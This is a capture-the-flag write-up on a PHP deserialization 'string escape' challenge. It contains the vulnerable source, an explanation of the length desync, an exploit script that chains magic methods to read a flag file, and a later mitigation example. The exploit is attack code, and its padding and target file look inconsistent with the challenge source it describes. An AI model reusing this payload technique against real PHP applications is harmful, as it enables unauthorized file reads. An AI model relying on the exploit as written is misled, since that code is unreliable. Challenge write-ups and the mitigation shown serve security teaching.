DASCTF_WEB1
Challenge setter: 喝雪碧的鸡
Cheers:
Source
<?php
show_source("index.php");

// Applied to the serialized blob before it is stored: 3 bytes -> 1 byte
function write($data) {
    return str_replace(chr(0) . '*' . chr(0), ' ', $data);
}

// Applied to the stored blob before unserialize(): 1 byte -> 3 bytes
function read($data) {
    return str_replace(' ', chr(0) . '*' . chr(0), $data);
}

class A {
    public $username;
    public $password;
    function __construct($a, $b) {
        $this->username = $a;
        $this->password = $b;
    }
}

class B {
    public $b = 'gqy';
    function __destruct() {
        $c = 'a' . $this->b;   // string concatenation triggers __toString() on $this->b
        echo $c;
    }
}

class C {
    public $c;
    function __toString() {
        //flag.txt
        echo file_get_contents($this->c);
        return 'nice';
    }
}

$a = new A($_GET['a'], $_GET['b']);
// The step that stores the serialized data is omitted; below it is fetched back and unserialized
$b = unserialize(read(write(serialize($a))));
Reference: https://www.cnblogs.com/magic-zero/p/11643916.html
Analysis
function write($data) {
    return str_replace(chr(0) . '*' . chr(0), ' ', $data);
}
function read($data) {
    return str_replace(' ', chr(0) . '*' . chr(0), $data);
}
These two functions cause a string escape because of the strict rules of the serialization format: serialize() records every string as s:N:"...", and unserialize() trusts N, reading exactly N bytes. A replacement that changes the byte length after serialize() has run leaves N out of sync with the real content, so the parser stops in the middle of a user-controlled value and whatever follows is parsed as structure instead of data.
exp
<?php
// Local copies of the target's classes, used only to build the payload
class A {
    public $username;
    public $password;
}
class B {
    public $b = 'gqy';
}
class C {
    public $c = "flag.php";
}

// B::__destruct() concatenates $this->b, which calls C::__toString(), which reads the file
$c = new C();
$b = new B();
$b->b = $c;

// Goes into the `password` field: once the parser has swallowed the prefix
// `";s:8:"password";s:73:"AAAA` (27 bytes), the rest is parsed as a new
// property `h3zh1` whose value is the B object.
$exp = 'AAAA";s:5:"h3zh1";' . serialize($b);

// Goes into the `username` field: the padding that makes the parser consume
// those 27 bytes, one \0 per byte of prefix to swallow
$aa = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";

echo "a=" . $aa . "&b=" . $exp;
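For contrast, the same storage chain written the way it should have been. This is an added example, not code from the challenge or the writeup; the helper names store_user and load_user are my own. It applies the transform to the field values before serialize() (so every s:N: is computed on the final bytes) and restricts unserialize() to the one class the blob is allowed to contain, so a smuggled O:1:"B" never gets a __destruct() to run.

```php
<?php
// Added example (not part of the original writeup). Helper names are assumed.

class A {
    public $username;
    public $password;
    function __construct($a, $b) {
        $this->username = $a;
        $this->password = $b;
    }
}

// Mitigation 1: transform the field VALUES, then serialize. serialize() then
// writes s:N: for the already-transformed bytes, so declared length and
// stored content can never drift apart.
function store_user(string $username, string $password): string {
    $clean = function (string $v): string {
        return str_replace(chr(0) . '*' . chr(0), ' ', $v);
    };
    return serialize(new A($clean($username), $clean($password)));
}

// Mitigation 2: the blob only ever holds an A, so say so. Any other O:...
// token becomes __PHP_Incomplete_Class, whose magic methods never run.
function load_user(string $blob): ?A {
    $obj = @unserialize($blob, ['allowed_classes' => ['A']]);
    return ($obj instanceof A) ? $obj : null;
}

// Constructed input shaped like the writeup's payload: the password field
// carries a fake property and an embedded B/C object graph.
$payload = 'AAAA";s:5:"h3zh1";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}';
$user = load_user(store_user(str_repeat(chr(0) . '*' . chr(0), 9), $payload));

// The payload survives the round trip as plain data in the password field.
if (!($user instanceof A) || $user->password !== $payload) {
    throw new RuntimeException('round trip changed the stored value');
}

// Even a blob that already contains a B is neutralised by allowed_classes:
// the result is an incomplete-class placeholder, not a B with a destructor.
$smuggled = unserialize('O:1:"B":1:{s:1:"b";s:3:"gqy";}', ['allowed_classes' => ['A']]);
echo get_class($smuggled), "\n";
```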